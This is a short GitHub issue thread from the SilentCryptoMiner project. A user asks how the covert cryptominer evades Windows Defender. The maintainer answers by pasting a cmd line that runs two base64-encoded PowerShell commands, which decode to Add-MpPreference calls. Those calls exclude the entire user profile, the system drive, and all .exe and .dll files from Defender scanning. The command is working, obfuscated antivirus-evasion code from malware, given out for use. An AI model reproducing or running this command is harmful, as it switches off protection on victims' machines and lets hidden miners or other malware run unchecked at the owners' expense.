### ISSUE TITLE
WD 

### ISSUE THREAD

**Issue by monerrrr123** [UnamSanctam/SilentCryptoMiner#342]
can you please show the protection action from windows defender

**Comment by monerrrr123** [comment]
it is the code of this function

**Comment by UnamSanctam** [comment]
It's here: https://github.com/UnamSanctam/SilentCryptoMiner/blob/e7d01c6c5ba7e9fd88e9cbcadd25c64c02773939/SilentCryptoMiner/Classes/Codedom.cs#L18 which when compiled becomes 
```
cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
```

**Comment by monerrrr123** [comment]
I want to find out exactly how she does adding to exceptions

**Comment by UnamSanctam** [comment]
It runs a powershell command (using cmd) that adds the exclusions as you can see above.
